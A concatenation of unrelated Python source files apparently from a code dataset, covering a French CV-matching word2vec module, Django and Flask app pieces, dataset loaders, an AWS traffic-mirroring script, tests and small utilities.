plt.xlim(Y[:, 0].min()-50, Y[:, 0].max()+50)
plt.ylim(Y[:, 1].min()-50, Y[:, 1].max()+50)
plt.title('t-SNE visualization for {}'.format(word.title()))
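# Example usage (sketch): `w2v_model` is assumed to be a trained gensim Word2Vec
# model whose vocabulary contains the plotted words, e.g.:
#   w2v_model = gensim.models.Word2Vec(token_lists, vector_size=100, min_count=1)
#   tsnescatterplot(w2v_model, "python", ["java", "sql"], w2v_model.vector_size)
#   plt.show()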
def tokenize(text):
doc = nlp(text)
#with doc.retokenize() as retokenizer:
# for ent in doc.ents:
# retokenizer.merge(doc[ent.start:ent.end])
return [x.text for x in doc]
def multiword_tokenize(text, mwe):
# Initialize the MWETokenizer
protected_tuples = [word_tokenize(word) for word in mwe]
protected_tuples_underscore = ['_'.join(word) for word in protected_tuples]
tokenizer = MWETokenizer(protected_tuples)
# Tokenize the text.
#tokenized_text = tokenizer.tokenize(word_tokenize(text,language='French'))
#print(tokenize(text))
tokenized_text = tokenizer.tokenize(tokenize(text))
#print(tokenized_text)
# Replace the underscored protected words with the original MWE
for i, token in enumerate(tokenized_text):
if token in protected_tuples_underscore:
tokenized_text[i] = mwe[protected_tuples_underscore.index(token)]
return tokenized_text
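# Illustrative example (made-up strings): protecting a multi-word entity so it
# survives tokenization as a single token:
#   multiword_tokenize("gestion de projet agile", ["gestion de projet"])
#   # -> ["gestion de projet", "agile"]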
def transformation(text):
list_entities=joblib.load('./Pickles/list_entities.pkl',"r")
list_entities_transforme=joblib.load('./Pickles/list_entities_transforme.pkl',"r")
list_entities_simple=joblib.load('./Pickles/list_entities_simple.pkl',"r")
list_entities_simple_transforme=joblib.load('./Pickles/list_entities_simple_transforme.pkl',"r")
list_verbs_final=joblib.load('./Pickles/list_verbs_final.pkl',"r")
list_verbs_transforme=joblib.load('./Pickles/list_verbs_transforme.pkl',"r")
text=preprocess(text)
text=text.lower()
chars = "/\*_{}[]()>#-.!$?–»|&«<:,@&©"
for c in chars:
text = text.replace(c,'')
text=text.replace(' + ','+')
text=text.replace(' +','+')
text=text.replace('+ ','+')
text=text.lstrip(' ').rstrip(' ')
text_token = multiword_tokenize(text, list_entities)
text_token_new = []
for text in text_token:
if (text not in list_entities_simple and text not in np.asarray(list_entities)):
text_token_new.append(remove_punctuation(text))
else:
text_token_new.append(text)
tokens = []
for text in text_token_new:
if text not in french_stopwords and not(text.isdigit()):
if((text not in list_entities_simple) and (text not in np.asarray(list_entities)) and (text not in list_verbs_final)):
tokens.append(change_accents(text))
else:
tokens.append(text)
tokens = [text for text in tokens if len(text)>0]
text_tokens = []
for text in tokens:
if(text in list_entities):
text_tokens.append(list_entities_transforme[np.where(np.asarray(list_entities)==text)[0][0]])
elif(text in list_entities_simple):
text_tokens.append(list_entities_simple_transforme[np.where(list_entities_simple==text)[0][0]])
elif(text in list_verbs_final):
text_tokens.append(list_verbs_transforme[np.where(list_verbs_final==text)[0][0]])
else:
text = str(remove_quote(text))
text = str(remove_special_quote(text))
text = str(remove_multiple_space(text))
text_tokens.append(snowBallStemmer.stem(text))
text_tokens = [text for text in text_tokens if len(text)>2]
return text_tokens
def calcul_similarity(word1,word2,model):
arr1 = model.wv[word1].reshape(1, -1)
arr2 = model.wv[word2].reshape(1, -1)
return cosine_similarity(arr1,arr2)[0][0]
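# Example usage (sketch): `model` is assumed to be a trained gensim Word2Vec
# whose vocabulary contains both words:
#   calcul_similarity("python", "java", model)  # -> cosine similarity in [-1, 1]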
def recherche(query,competences,model,CVs,TopK):
similarite=np.zeros(len(competences))-1
for i,comp in enumerate(competences):
comp=transformation(comp)
a=0
for word in query:
similarite_word=np.zeros(len(comp))-1
for c,word1 in enumerate(comp):
try:
#similarite_word[c]=model.similarity(word,word1)
similarite_word[c]=calcul_similarity(word,word1,model)
except KeyError:
continue
a+=np.max(similarite_word)
similarite[i]=a/len(query)
topc=np.argsort(similarite)[::-1][:TopK]
result = []
for i in range(TopK):
cand = {
"candidat": CVs[topc[i]],
"resultat": "{0:.2f}".format(similarite[topc[i]])
}
result.append(cand)
return result
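# Example usage (sketch; variable names are assumptions): rank stored skill
# profiles against a free-text query with the helpers defined above:
#   query_tokens = transformation("développeur python machine learning")
#   top = recherche(query_tokens, competences_list, w2v_model, cv_names, TopK=5)
#   # -> [{"candidat": ..., "resultat": "0.87"}, ...]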
## get word2vec for each sentences by using average word embeddings
def word2vec_sentence_embedding(reviews_unigram,model,model_size):
#print(reviews_unigram)
arr = np.array([0.0 for i in range(0, model_size)])
for index, word_list in enumerate(reviews_unigram):
#print(word_list)
try:
arr += model.wv[word_list]
except KeyError:
continue
if(len(reviews_unigram) == 0):
dict_word2vec = arr
else:
dict_word2vec = arr / len(reviews_unigram)
df_word2vec = pd.DataFrame(dict_word2vec).T
return df_word2vec
def get_sent_embs(sentences_trans,emb_model,model_size,tfidf):
sent_embs = []
for desc in range(len(sentences_trans)):
#print(desc)
if len(sentences_trans[desc]) > 0:
#print(desc)
sent_emb = np.zeros((1, model_size))
div = 0
sentence_trans_tfidf=tfidf.transform([' '.join(sentences_trans[desc])]).todense()
sentence_trans_tfidf=pd.DataFrame(sentence_trans_tfidf, columns=tfidf.get_feature_names())
for word in sentences_trans[desc]:
#print(word)
if word in emb_model.wv.key_to_index:
word_emb = emb_model.wv[word]
weight = sentence_trans_tfidf[word][0]
#print(word,weight)
sent_emb = np.add(sent_emb, word_emb * weight)
div += weight
else:
div += 1e-13 #to avoid dividing by 0
sent_emb = np.divide(sent_emb, div)
sent_embs.append(sent_emb.flatten())
return sent_embs
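# Example usage (sketch): `sentences_trans` is a list of token lists (output of
# transformation()) and `w2v_model` a trained gensim Word2Vec; the TF-IDF model
# must be fitted on the same corpus so the per-word weights line up:
#   tfidf = TfidfVectorizer().fit([' '.join(tokens) for tokens in sentences_trans])
#   cv_embeddings = get_sent_embs(sentences_trans, w2v_model, w2v_model.vector_size, tfidf)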
def recherche_offre(offre,cv,CVs,TopK):
similarite=np.zeros(len(cv))-1
for i,c in enumerate(cv):
similarite[i]=np.mean(np.max(cosine_similarity(offre,cv[i]),axis=1))
topc=np.argsort(similarite)[::-1][:TopK]
result = []
for i in range(TopK):
cand = {
"candidat": CVs[topc[i]],
"resultat": "{0:.2f}".format(similarite[topc[i]])
}
result.append(cand)
return result | 1.929688 | 2 |
config/admin.py | 2019342a/improved-enigma | 0 | 12789288 | <gh_stars>0
from django.contrib import admin
class SkorAdmin(admin.AdminSite):
site_title = "Skor"
site_header = "Skor"
index_title = "Skor administration"
site_url = None
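# Hypothetical wiring (not part of this module): instantiate the custom site and
# route to it from the project's urls.py, for example:
#   admin_site = SkorAdmin(name="skor-admin")
#   urlpatterns = [path("admin/", admin_site.urls)]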
| 1.3125 | 1 |
datasets/nmr_wine/__init__.py | ryuzakyl/data-bloodhound | 3 | 12789289 | #!/usr/bin/env
# -*- coding: utf-8 -*-
# Copyright (C) <NAME> - All Rights Reserved
# Unauthorized copying of this file, via any medium is strictly prohibited
# Proprietary and confidential
# Written by <NAME> <<EMAIL>>, January 2017
import os
import numpy as np
import pandas as pd
import scipy.io as sio
import utils.datasets as utils
# ---------------------------------------------------------------
# data set paths
__data_path = "{}/data/NMR_40wines.mat".format(os.path.split(__file__)[0])
__pickle_path = "{}/cache/nmr_wine.pickle".format(os.path.split(__file__)[0])
# ---------------------------------------------------------------
# TODO: Add docstring with usage examples (see 'uv_fuel' data set)
@utils.load_data_from_pickle(__pickle_path)
def load_nmr_wines():
"""Loads the NMR Wines data set.
Returns:
A Pandas DataFrame with all the data set info.
Examples:
>>> ds = load_nmr_wines()
>>> ds['wine_data'].shape
(40, 8729)
>>> ds['wine_ints'].shape
(22, 1)
"""
# loading matlab data set object
raw_data = sio.loadmat(__data_path)
# validating loaded data
if raw_data is None:
raise Exception('Error while loading 1H-NMR Wines data.')
# getting features labels
features_labels = raw_data['ppm'][0].tolist()
# getting properties labels
props_labels = list(map(lambda x: x[0], raw_data['Label'][0]))
# getting samples data
data = raw_data['X']
# getting properties data
props_data = raw_data['Y']
# creating the wine data set
all_data = np.hstack([data, props_data])
all_labels = range(all_data.shape[0])
all_features = features_labels + props_labels
wine_ds = utils.build_data_set(all_data.tolist(), all_labels, all_features)
# ----------------------
wine_ints_data = raw_data['wine_ints'][0]
wine_ints_ds = pd.DataFrame(wine_ints_data)
# ----------------------
# the final data set
ds = {
'wine_data': wine_ds,
'wine_ints': wine_ints_ds,
}
# returning the final data set
return ds
| 2.578125 | 3 |
footer/menus/__init__.py | AutomataRaven/azaharTEA | 5 | 12789290 | __all__ = ['highlightmenu.HighlightMenu','highlightmenu.HighligthStyleMenu']
| 1.101563 | 1 |
run_game.py | hdaftary/Flappy-Birds | 0 | 12789291 | import pygame
import flappy
from thread import callback
import speech_recognition as sr
import sys
if __name__ == '__main__':
if len(sys.argv) == 3 and sys.argv[2] == "False":
r = sr.Recognizer()
m = sr.Microphone()
with m as source:
r.adjust_for_ambient_noise(source) # we only need to calibrate once, before we start listening
# start listening in the background (note that we don't have to do this inside a `with` statement)
stop_listening = r.listen_in_background(m, callback)
pygame.init() # initialize pygame
pygame.display.set_caption('Flappy Birds For Handicapped People')
flappy.play_game()
| 3.140625 | 3 |
aws_network_tap/tap.py | vectranetworks/AWS-Session-Mirroring-Tool | 3 | 12789292 | <gh_stars>1-10
"""
AWS Network Tapping Tool
For installing AWS Session Mirroring on Eligible Nitro instances.
Took takes a "tap everything" approach at the VPC level.
Specific instances can be opted out with the blacklist tool.
"""
import logging
from aws_network_tap.models.ec2_api_client import Ec2ApiClient, VPC_Props
from aws_network_tap.models.spile_tapper import SpileTapper
from aws_network_tap.models.tag_config import VPCTagConfig
def main() -> None:
logging.getLogger().setLevel(logging.INFO)
region = Ec2ApiClient.get_region()
for vpc_prop in Ec2ApiClient.list_vpcs(region=region): # type: VPC_Props
logging.info(f" Managing Session Mirroring for VPC {vpc_prop.name}: {vpc_prop.vpc_id}")
config = VPCTagConfig(vpc_prop.tags)
SpileTapper.manage(region=region, vpc_ids=[vpc_prop.vpc_id], config=config)
if __name__ == "__main__":
main()
| 2 | 2 |
credoscript/contrib/chemblws.py | tlb-lab/credoscript | 0 | 12789293 | <gh_stars>0
import json
from urllib import urlencode
from urllib2 import quote, urlopen, HTTPError, URLError
class ChEMBLWS(object):
'''
'''
def __init__(self):
'''
'''
self._url = "https://www.ebi.ac.uk/chemblws/{entity}/{target}/{query}.json"
def _get_instance(self, entity, target, query):
"""
"""
url = self._url.format(entity=entity, target=target, query=query)
try:
response = urlopen(url)
except HTTPError, error:
raise error
else:
return json.loads(response.read())
def compound_bioactivities(self, chembl_id):
"""
Get individual compound bioactivities
"""
return self._get_instance('compounds', chembl_id, 'bioactivities') | 3.125 | 3 |
baekjoon/python/complete_binary_tree_3038.py | yskang/AlgorithmPracticeWithPython | 0 | 12789294 | <gh_stars>0
# Title: Complete Binary Tree (완전 이진 트리)
# Link: https://www.acmicpc.net/problem/3038
import sys
sys.setrecursionlimit(10 ** 6)
read_single_int = lambda: int(sys.stdin.readline().strip())
def f(x: int, y: int, n: int):
if y == (1 << n - 1):
print(y*3-1-x)
return
print(x)
f(x+y, y*2, n)
f(x+y*2, y*2, n)
def solution(n: int):
f(1, 1, n)
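# Quick illustrative trace: solution(2) prints 1, then 3, then 2 (the root label
# first, then the labels derived for the two nodes on the last level).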
def main():
n = read_single_int()
solution(n)
if __name__ == '__main__':
main() | 3.21875 | 3 |
xls/solvers/python/lec_characterizer_test.py | ted-xie/xls | 0 | 12789295 | <filename>xls/solvers/python/lec_characterizer_test.py
# Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for xls.solvers.lec_characterizer."""
import os
import tempfile
import portpicker
from google.protobuf import text_format
from absl.testing import absltest
from xls.common import gfile
from xls.common import runfiles
from xls.ir import op_pb2
from xls.ir import xls_type_pb2
from xls.ir.python import package
from xls.solvers.python import lec_characterizer
from xls.solvers.python import lec_characterizer_pb2
class LecCharacterizerTest(absltest.TestCase):
_CELL_LIBRARY_PATH = 'xls/netlist/fake_cell_library.textproto'
def setUp(self):
super().setUp()
server_path = runfiles.get_path('xls/synthesis/dummy_synthesis_server_main')
self.port = portpicker.pick_unused_port()
self.lc = lec_characterizer.LecCharacterizer(
[server_path, '--port={}'.format(self.port)], self.port)
cell_lib_path = runfiles.get_path(self._CELL_LIBRARY_PATH)
with gfile.open(cell_lib_path, 'r') as f:
self.cell_lib_text = f.read()
def tearDown(self):
super().tearDown()
portpicker.return_port(self.port)
# Smoke test showing we're able to generate IR/netlist sources.
def test_generates_sources(self):
p = package.Package('the_package')
ir_text, netlist_text = self.lc._generate_sources(
op_pb2.OpProto.OP_ADD,
[p.get_bits_type(8), p.get_bits_type(8)], p.get_bits_type(8))
self.assertIn('ret add.1: bits[8]', ir_text)
self.assertEqual(netlist_text, '// NETLIST')
# Tests that an extremely simple case runs without exploding.
def test_lec_smoke(self):
p = package.Package('the_package')
temp_dir = tempfile.TemporaryDirectory()
results_path = os.path.join(temp_dir.name, 'results.textproto')
num_iters = 16
byte_type = p.get_bits_type(8)
self.lc.run(
op=op_pb2.OpProto.OP_ADD,
samples=[([byte_type, byte_type], byte_type)],
num_iters=num_iters,
cell_library_textproto=self.cell_lib_text,
results_path=results_path,
lec_fn=lambda a, b, c, d: True)
# Open results, verify contents
results = lec_characterizer_pb2.LecTiming()
with gfile.open(results_path, 'r') as f:
text_format.Parse(f.read(), results)
self.assertEqual(results.ir_function, 'single_op_OP_ADD')
self.assertLen(results.test_cases, 1)
test_case = results.test_cases[0]
self.assertLen(test_case.exec_times_us, num_iters)
# Tests that we can correctly append to a preexisting proto file.
def test_read_then_write(self):
p = package.Package('the_package')
temp_dir = tempfile.TemporaryDirectory()
results_path = os.path.join(temp_dir.name, 'results.textproto')
results = lec_characterizer_pb2.LecTiming()
results.ir_function = 'single_op_OP_ADD'
# Add one un-touched test case, and add one that should be appended to.
proto_byte = xls_type_pb2.TypeProto()
proto_byte.type_enum = xls_type_pb2.TypeProto.BITS
proto_byte.bit_count = 8
proto_short = xls_type_pb2.TypeProto()
proto_short.type_enum = xls_type_pb2.TypeProto.BITS
proto_short.bit_count = 16
test_case = results.test_cases.add()
param = test_case.function_type.parameters.add()
param.CopyFrom(proto_short)
param = test_case.function_type.parameters.add()
param.CopyFrom(proto_short)
test_case.function_type.return_type.CopyFrom(proto_short)
test_case = results.test_cases.add()
param = test_case.function_type.parameters.add()
param.CopyFrom(proto_byte)
param = test_case.function_type.parameters.add()
param.CopyFrom(proto_byte)
test_case.function_type.return_type.CopyFrom(proto_byte)
test_case.exec_times_us.extend([1, 3, 7])
test_case.average_us = 3
with gfile.open(results_path, 'w') as f:
f.write(text_format.MessageToString(results))
num_iters = 16
byte_type = p.get_bits_type(8)
self.lc.run(
op=op_pb2.OpProto.OP_ADD,
samples=[([byte_type, byte_type], byte_type)],
num_iters=num_iters,
cell_library_textproto=self.cell_lib_text,
results_path=results_path,
lec_fn=lambda a, b, c, d: True)
results = lec_characterizer_pb2.LecTiming()
with gfile.open(results_path, 'r') as f:
text_format.Parse(f.read(), results)
self.assertEqual(results.ir_function, 'single_op_OP_ADD')
self.assertLen(results.test_cases, 2)
for test_case in results.test_cases:
if test_case.function_type.return_type.bit_count == 16:
self.assertEmpty(test_case.exec_times_us)
else:
self.assertLen(test_case.exec_times_us, 3 + num_iters)
if __name__ == '__main__':
absltest.main()
| 2.3125 | 2 |
banking/utils.py | justmytwospence/banking-oop | 0 | 12789296 | <filename>banking/utils.py
import logging
logger = logging.getLogger(__name__)
def split_name(name):
try:
names = name.split(" ")
assert len(names) == 2
return names[0], names[1]
except Exception as e:
        logger.error(f"Expected exactly one first name and one last name, got {name!r}: {e}")
return None
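# Illustrative example: split_name("Ada Lovelace") -> ("Ada", "Lovelace");
# any other shape (e.g. "Ada" or "Ada B. Lovelace") logs an error and returns None.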
| 3.1875 | 3 |
basad.py | qitianchan/new-busad | 0 | 12789297 | <filename>basad.py
# -*- coding: utf-8 -*-
from flask import Flask, blueprints, url_for
from extentions import db, login_manager
from views import auth_blueprint, busad_blueprint
from models import User
def create_app():
app = Flask(__name__)
# app config
app.config.from_object('config.DefaultConfig')
_init_extention(app)
_register_blueprint(app)
with app.app_context():
# create database
db.create_all()
return app
def _init_extention(app):
"""
    Initialize Flask extensions (database and login manager).
:param app:
:return:
"""
db.init_app(app)
# login_manager
login_manager.init_app(app)
login_manager.login_view = 'auth_blueprint.login'
@login_manager.user_loader
def load_user(user_id):
return User.get(user_id)
def _register_blueprint(app):
"""
:param app:
:return:
"""
app.register_blueprint(auth_blueprint)
app.register_blueprint(busad_blueprint)
if __name__ == '__main__':
app = create_app()
app.run(port=8001) | 2.359375 | 2 |
example_motion_sensor_gesture_data.py | coldppc/kpk | 0 | 12789298 | '''
This example will print the gesture name
'''
from communitysdk import list_connected_devices, MotionSensorKit
devices = list_connected_devices()
msk_filter = filter(lambda device: isinstance(device, MotionSensorKit), devices)
msk = next(msk_filter, None) # Get first Motion Sensor Kit
if msk == None:
print('No Motion Sensor was found :(')
else:
def on_gesture(gestureValue):
print('Gesture detected:', gestureValue)
try:
msk.set_mode('gesture')
except Exception as e:
print(e)
msk.on_gesture = on_gesture
print('Wave your hand above the Motion Sensor:')
| 3.265625 | 3 |
container/src/models/note.py | PowercoderJr/oonote | 0 | 12789299 | <gh_stars>0
from app import db
class Note(db.Model):
id_ = db.Column(db.String(16), primary_key=True)
text = db.Column(db.Text)
response = db.Column(db.String(100))
created_at = db.Column(db.DateTime)
read_at = db.Column(db.DateTime)
password = db.Column(db.String(64))
| 2.078125 | 2 |
flasktodo/todos.py | blong191/flask-todo | 0 | 12789300 | <filename>flasktodo/todos.py<gh_stars>0
from flask import Blueprint, render_template, request
from . import db
bp = Blueprint("todos", __name__)
@bp.route("/", methods=("GET", "POST"))
def index():
"""View for home page which shows list of to-do items."""
conn = db.get_db()
cur = conn.cursor()
cur.execute('SELECT * FROM todos')
print(request.form)
if request.method == 'POST':
        # Pull the submitted form fields; .get() avoids a 400 error when a
        # filter form posts without a description field.
        description = request.form.get('description')
completed = request.form.get('completed')
uncompleted = request.form.get('uncompleted')
all = request.form.get('all')
        if description is not None:
#Add a new task
cur.execute(
'INSERT INTO todos (description, completed, created_at) VALUES (%s, FALSE, CURRENT_TIMESTAMP)',
(description,)
)
#Make sure the new task is reconized by cur
cur.execute('SELECT * FROM todos')
if uncompleted != None or completed != None:
#Checks for which submit was pushed
if uncompleted != None:
cur.execute('SELECT * FROM todos WHERE completed = FALSE')
else:
cur.execute('SELECT * FROM todos WHERE completed = TRUE')
conn.commit()
#if a button(submit) is pressed, show only certain tasks, completed, uncompleted, or all
todos = cur.fetchall()
cur.close()
return render_template("index.html", todos=todos)
| 2.96875 | 3 |
src/collective/eeafaceted/z3ctable/tests/vocabularies.py | collective/collective.eeafaceted.z3ctable | 1 | 12789301 | # encoding: utf-8
from zope.interface import implements
from zope.schema.vocabulary import SimpleVocabulary
from zope.schema.interfaces import IVocabularyFactory
from zope.schema.vocabulary import SimpleTerm
from plone.memoize.instance import memoize
class TestingVocabulary(object):
implements(IVocabularyFactory)
@memoize
def __call__(self, context):
""" """
res = []
res.append(SimpleTerm('existing_key1', 'existing_key1', 'Existing v\xc3\xa9lue 1'))
res.append(SimpleTerm('existing_key2', 'existing_key2', 'Existing v\xc3\xa9lue 2'))
res.append(SimpleTerm('existing_key3', 'existing_key3', 'Existing v\xc3\xa9lue 3'))
return SimpleVocabulary(res)
TestingVocabularyFactory = TestingVocabulary()
class TestingFullVocabulary(object):
implements(IVocabularyFactory)
@memoize
def __call__(self, context):
""" """
res = []
res.append(SimpleTerm('existing_key1', 'existing_key1', 'Full existing value 1'))
res.append(SimpleTerm('existing_key2', 'existing_key2', 'Full existing value 2'))
res.append(SimpleTerm('existing_key3', 'existing_key3', 'Full existing value 3'))
return SimpleVocabulary(res)
TestingFullVocabularyFactory = TestingFullVocabulary()
| 2.125 | 2 |
oops_fhir/r4/value_set/related_artifact_type.py | Mikuana/oops_fhir | 0 | 12789302 | <filename>oops_fhir/r4/value_set/related_artifact_type.py
from pathlib import Path
from fhir.resources.valueset import ValueSet as _ValueSet
from oops_fhir.utils import ValueSet
from oops_fhir.r4.code_system.related_artifact_type import (
RelatedArtifactType as RelatedArtifactType_,
)
__all__ = ["RelatedArtifactType"]
_resource = _ValueSet.parse_file(Path(__file__).with_suffix(".json"))
class RelatedArtifactType(RelatedArtifactType_):
"""
RelatedArtifactType
The type of relationship to the related artifact.
Status: draft - Version: 4.0.1
http://hl7.org/fhir/ValueSet/related-artifact-type
"""
class Meta:
resource = _resource
| 1.953125 | 2 |
Project/pix2pix_dense/loss.py | Kaustubh1Verma/CS671_Deep-Learning_2019 | 0 | 12789303 | <filename>Project/pix2pix_dense/loss.py
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.layers.core import Flatten, Dense, Dropout
from tensorflow.python.keras.layers.convolutional import Convolution2D, MaxPooling2D, ZeroPadding2D
from tensorflow.python.keras.optimizers import SGD
import cv2
from tensorflow.python.keras.applications import VGG19
import tensorflow as tf
from tensorflow.python.keras.preprocessing import image
from tensorflow.python.keras.applications.vgg19 import preprocess_input
from tensorflow.python.keras.models import Model
import numpy as np
import matplotlib.pyplot as plt
import tensorflow.python.keras.backend as k
model=VGG19(weights="vgg19_weights_tf_dim_ordering_tf_kernels_notop.h5",include_top=False)
model_extractfeatures = Model(inputs=model.input, outputs=model.get_layer('block4_pool').output)
def feature_extract(x):
fc2_features = model_extractfeatures.predict(x)
return fc2_features
def preprocess(img):
    img = cv2.resize(img, (224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
return x
def smooth_L1_loss(y_true, y_pred):
return tf.losses.huber_loss(y_true, y_pred)
def total_loss(y_true, y_pred):
# img1=image.load_img(y_true_path, target_size=(224, 224))
# img2=image.load_img(y_pred_path, target_size=(224, 224))
f1=preprocess(y_true)
f2=preprocess(y_pred)
fx1=feature_extract(f1)
fx2=feature_extract(f2)
loss1 = tf.reduce_mean(tf.squared_difference(fx1, fx2))
loss2=smooth_L1_loss(y_true,y_pred)
return k.eval(loss1),k.eval(loss2) | 2.625 | 3 |
code-files/frosch2010_Tabu_settings.py | Frosch2010/discord-tabu | 2 | 12789304 | class tabu_settings:
tabu_channelID_join = None
tabu_channelID_team_1 = None
tabu_channelID_team_2 = None
tabu_channelID_add_terms = None
tabu_channelID_bot_admin = None
tabu_bot_token = None
tabu_server_ID = None
tabu_default_save_terms = True
tabu_save_after_game = True
tabu_save_after_auto_add = True
tabu_default_points_to_win = 200
tabu_round_lenght = 60
tabu_switching_lenght = 10
tabu_min_players = 4
tabu_message_auto_delete = 10
tabu_revenge_time = 30
tabu_same_chance = True | 1.359375 | 1 |
tester.py | jpypi/Multitron | 1 | 12789305 | #!/usr/bin/env python3
import numpy as np
import pickle
from PIL import Image
w = pickle.load(open("weights1000.pkl", "rb"))
def Classify(example):
return w.dot(example)
#Seems to get 2, 3, 4 correct...
for i in range(0, 5):
image = Image.open("test_images/{}.jpg".format(i)).convert("L")
x = np.asarray(image.getdata())
x = (255 - x)/255
x = np.r_[x, 1]
y = Classify(x)
print(y)
print("Actual: {} Classification: {}".format(i, np.argmax(y)))
| 3.046875 | 3 |
tests/test_equality.py | calebmarcus/awacs | 0 | 12789306 | import unittest
from awacs import s3, ec2, iam
from awacs.aws import PolicyDocument, Statement, Action, Condition
from awacs.aws import StringEquals, StringLike
class TestEquality(unittest.TestCase):
def test_condition_equality(self):
self.assertEqualWithHash(
Condition(StringLike("s3:prefix", ["home/${aws:username}/*"])),
Condition(StringLike("s3:prefix", ["home/${aws:username}/*"])))
self.assertNotEqualWithHash(
Condition(StringLike("s3:prefix", ["home/${aws:username}/*"])),
Condition(StringLike("s3:prefix", ["other/${aws:username}/*"])))
self.assertNotEqualWithHash(
Condition(StringLike("s3:prefix", ["home/${aws:username}/*"])),
Condition(StringEquals("s3:prefix", ["home/${aws:username}/*"])))
def test_arn_equality(self):
self.assertEqualWithHash(
s3.ARN("myBucket"), s3.ARN("myBucket"))
self.assertNotEqualWithHash(
s3.ARN("myBucket"), s3.ARN("myOtherBucket"))
self.assertEqualWithHash(
ec2.ARN("some-resource", "some-region", "some-account"),
ec2.ARN("some-resource", "some-region", "some-account"))
self.assertNotEqualWithHash(
ec2.ARN("some-resource", "some-region", "some-account"),
ec2.ARN("some-resource", "some-other-region", "some-account"))
self.assertNotEqualWithHash(
ec2.ARN("some-resource", "some-region", "some-account"),
iam.ARN("some-resource", "some-region", "some-account"))
def test_action_equality(self):
self.assertEqualWithHash(
Action('autoscaling', 'DescribeLaunchConfigurations'),
Action('autoscaling', 'DescribeLaunchConfigurations'))
self.assertNotEqualWithHash(
Action('autoscaling', 'DescribeLaunchConfigurations'),
Action('ec2', 'DescribeInstances'))
def test_statement_equality(self):
one = Statement(
Effect="Allow",
Action=[
Action('autoscaling', 'DescribeLaunchConfigurations'),
],
Resource=["*"]
)
one_again = Statement(
Effect="Allow",
Action=[
Action('autoscaling', 'DescribeLaunchConfigurations'),
],
Resource=["*"]
)
two = Statement(
Effect="Allow",
Action=[
Action('ec2', 'DescribeInstances'),
],
Resource=["*"]
)
self.assertEqualWithHash(one, one_again)
self.assertNotEqualWithHash(one, two)
def test_policy_document_equality(self):
one = PolicyDocument(
Version="2012-10-17",
Statement=[
Statement(
Effect="Allow",
Action=[
Action('autoscaling', 'DescribeLaunchConfigurations'),
],
Resource=["*"]
)
]
)
one_again = PolicyDocument(
Version="2012-10-17",
Statement=[
Statement(
Effect="Allow",
Action=[
Action('autoscaling', 'DescribeLaunchConfigurations'),
],
Resource=["*"]
)
]
)
two = PolicyDocument(
Version="2012-10-17",
Statement=[
Statement(
Effect="Allow",
Action=[
Action('ec2', 'DescribeInstances'),
],
Resource=["*"]
)
]
)
self.assertEqualWithHash(one, one_again)
self.assertNotEqualWithHash(one, two)
def assertEqualWithHash(self, one, two):
self.assertTrue(one == two)
self.assertEqual(hash(one), hash(two))
def assertNotEqualWithHash(self, one, two):
self.assertTrue(one != two)
self.assertNotEqual(hash(one), hash(two))
| 2.890625 | 3 |
tickets/migrations/0001_initial.py | mcm66103/ez-django | 1 | 12789307 | <reponame>mcm66103/ez-django<filename>tickets/migrations/0001_initial.py
# Generated by Django 2.2.13 on 2021-02-25 00:30
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('websites', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Ticket',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('status', models.CharField(choices=[('new', 'New'), ('in progress', 'In Progress'), ('ready for deployment', 'Ready For Deployment'), ('complete', 'Complete'), ('rejected', 'Rejected')], default='new', max_length=48)),
('name', models.CharField(max_length=128)),
('description', models.TextField()),
('owner', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='owner', to=settings.AUTH_USER_MODEL)),
('website', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='websites.Website')),
('worker', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='worker', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
]
| 1.617188 | 2 |
python-app/app/services/query.py | jnplonte/flask-api | 1 | 12789308 | <filename>python-app/app/services/query.py
def query(data):
    """Parse a filter string like "name:john|role:admin,user" into a query dict;
    comma-separated values become a Mongo-style ``$in`` clause."""
finalQuery = {}
query = data.split('|')
if len(query) >= 1:
for qData in query:
if (qData.find(':') != -1):
qDataFinal = qData.split(':')
if (qDataFinal[1].find(',') != -1):
arrQDataFinal = {'$in': qDataFinal[1].split(',')}
else:
arrQDataFinal = qDataFinal[1]
finalQuery[qDataFinal[0]] = arrQDataFinal
return finalQuery | 2.859375 | 3 |
src/primaires/scripting/actions/changer_prix.py | vlegoff/tsunami | 14 | 12789309 | # -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
